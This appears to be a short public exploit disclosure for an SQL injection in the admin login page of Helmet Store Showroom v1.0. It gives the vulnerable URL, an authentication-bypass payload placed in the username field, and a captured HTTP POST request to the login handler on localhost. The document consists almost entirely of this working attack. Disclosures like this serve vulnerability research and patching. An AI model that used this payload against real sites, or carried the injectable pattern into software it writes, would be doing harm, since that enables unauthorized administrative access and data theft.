# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection
# Exploit Author: Ameer Hamza
# Vendor Homepage:
# Software Link:
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.

[+] The username parameter is vulnerable to SQLi in login page
[+] URL --> http://localhost/hss/admin/login.php
[+] Username = ' OR 1=1-- -


POST /hss/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/hss/admin/login.php
Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa